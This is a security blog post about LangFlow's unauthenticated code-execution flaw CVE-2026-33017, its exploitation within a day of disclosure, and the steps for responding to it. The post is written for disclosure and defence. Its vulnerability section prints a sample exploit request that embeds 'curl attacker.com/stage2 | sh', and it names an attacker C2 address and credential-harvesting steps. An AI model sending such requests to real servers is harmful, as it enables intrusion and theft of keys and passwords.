
LangFlow's CVE-2026-33017 was already being exploited within 20 hours of disclosure

Ikesan

A CVSS 9.3 unauthenticated RCE in LangFlow was reported, and real-world exploitation was confirmed only 20 hours after public disclosure.

What LangFlow is

LangFlow is an open-source LLM application builder built on top of LangChain. It lets you construct AI pipelines through a visual flow editor where you connect nodes by dragging and dropping them. Because it is easy to build RAG pipelines and AI agents visually, it is widely adopted in both enterprise and developer LLMOps stacks. The problem is that many LangFlow instances are exposed to the internet.

Vulnerability details

CVE-2026-33017 exists in /api/v1/build_public_tmp/{flow_id}/flow. That endpoint lets public flows be built without authentication, but when a request includes the optional data parameter, it executes arbitrary Python code embedded in the supplied flow definition.

POST /api/v1/build_public_tmp/{flow_id}/flow
Content-Type: application/json

{
  "data": {
    "nodes": [
      {
        "type": "CustomComponent",
        "data": {
          "node": {
            "template": {
              "code": {
                "value": "import os; os.system('curl attacker.com/stage2 | sh')"
              }
            }
          }
        }
      }
    ]
  }
}

A single HTTP POST request is enough to run arbitrary code. No auth token and no CSRF token are required.

The root cause is an un-sandboxed exec() call, and it shares the same code path as CVE-2025-3248. CVE-2025-3248 affected an authenticated endpoint, but this endpoint has no authentication at all. Aviral Srivastava, who found and reported the bug, summarized the structural problem clearly: adding authentication would break the public-flow feature. The architecture needed sandboxing or removal of code execution, not just another access check.

| Item | Details |
| --- | --- |
| CVE ID | CVE-2026-33017 |
| CVSS score | 9.3 (Critical) |
| Affected versions | All versions up to v1.8.1 |
| Fixed version | 1.9.0.dev8 (development build) |
| Vulnerability type | Missing authentication + code injection |
| Reporter | Aviral Srivastava (reported on 2026-02-26) |
| Public disclosure | 2026-03-17 |
| Real-world exploitation | 2026-03-17, within 20 hours of disclosure |

How the attacks unfolded

Public disclosure happened on March 17, 2026. That same day, cloud security company Sysdig observed active exploitation.

The key detail is that no PoC existed at disclosure time. Attackers built a working exploit from the advisory alone and immediately began scanning the internet. Today, automated scanning is so fast that zero-day exploitation without a public PoC is no longer unusual.

The campaign progressed in stages: first simple HTTP POST probes to check execution, then payload delivery from the attacker C2 server (173.212.205[.]251:8443). Reconnaissance activity typical of an infostealer was also seen: reading /etc/passwd and extracting environment variables, configuration files, and .env files. The goal appears to have been collecting database passwords and API keys for the next stage of the attack.

flowchart TD
    A[CVE-2026-33017 disclosed<br/>2026-03-17] --> B[No PoC needed<br/>exploit built from the advisory]
    B --> C[Internet-wide scanning starts<br/>within 20 hours]
    C --> D[Simple HTTP POST probes<br/>check whether execution is possible]
    D --> E[Successful exploitation]
    E --> F[C2 connection<br/>173.212.205.251:8443]
    E --> G[Reconnaissance phase]
    F --> H[Receive the next-stage payload]
    G --> I[Read /etc/passwd]
    G --> J[Extract environment variables and .env files]
    G --> K[Collect config files]
    I & J & K --> L[Credential theft and malware deployment prep]

How to respond

Upgrading to development build 1.9.0.dev8 is the highest priority. If you want to wait for a stable release, keep the LangFlow instance off the internet until then.

If the system was already exposed publicly, assume compromise.

  • Rotate all API keys, database passwords, and LLM provider keys
  • Investigate suspicious outbound connections, especially on port 8443
  • Check logs for unauthorized access to .env files and environment variables
  • If running in containers, rebuild and redeploy the image
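
To find requests of the shape shown under "Vulnerability details" in your own logs, the following triage script is an added example, not code from LangFlow or from the researchers named here. It assumes a hypothetical reverse-proxy log in JSON lines with src, method, path and body fields; the sample records are constructed.

```python
import json
import re

# Endpoint path from the advisory; {flow_id} is matched as a single path segment.
ENDPOINT = re.compile(r"^/api/v1/build_public_tmp/[^/]+/flow/?(?:\?.*)?$")

def embedded_code(node):
    """Return the string at data.node.template.code.value of a node, or None."""
    cur = node
    for key in ("data", "node", "template", "code", "value"):
        if not isinstance(cur, dict):
            return None
        cur = cur.get(key)
    return cur if isinstance(cur, str) else None

def triage(log_lines):
    """Return one finding per POST to the endpoint that supplies its own flow data."""
    findings = []
    for line in log_lines:
        try:
            rec = json.loads(line)  # assumed log format: one JSON object per line
            method, path = rec.get("method"), str(rec.get("path"))
            body = json.loads(rec.get("body") or "{}")
        except (ValueError, AttributeError, TypeError):
            continue  # not a JSON record, or the logged body is not JSON
        if method != "POST" or not ENDPOINT.match(path):
            continue
        data = body.get("data") if isinstance(body, dict) else None
        if not isinstance(data, dict):
            continue  # no caller-supplied flow definition in this request
        nodes = data.get("nodes") if isinstance(data.get("nodes"), list) else []
        code = [c for c in map(embedded_code, nodes) if c is not None]
        findings.append({"src": rec.get("src"), "path": path, "code": code})
    return findings

# Constructed sample records (documentation IP ranges, placeholder flow ids).
SAMPLE = [
    json.dumps({"src": "198.51.100.7", "method": "POST",
                "path": "/api/v1/build_public_tmp/FLOW-ID-1/flow", "body": "{}"}),
    json.dumps({"src": "203.0.113.9", "method": "POST",
                "path": "/api/v1/build_public_tmp/FLOW-ID-2/flow",
                "body": json.dumps({"data": {"nodes": [{"type": "CustomComponent",
                    "data": {"node": {"template": {"code": {"value": "print('constructed')"}}}}}]}})}),
    json.dumps({"src": "203.0.113.9", "method": "GET", "path": "/health", "body": ""}),
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f['src']} {f['path']} code_fields={len(f['code'])}")
```

Each finding keeps the extracted code strings so an analyst can review what the request asked the server to run; a finding with an empty code list still shows that a caller-supplied flow definition reached the endpoint.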

The urgency is lower if LangFlow is only used locally, but environments reachable through VPNs or bastions should still be treated as internet-exposed.


According to Rapid7’s 2026 Global Threat Landscape report, organizations take about 20 days on average to patch. This time, attacks started within 20 hours. Tools with exec()-based flow engines are inherently attractive targets, so any public deployment of this type of tool deserves a review.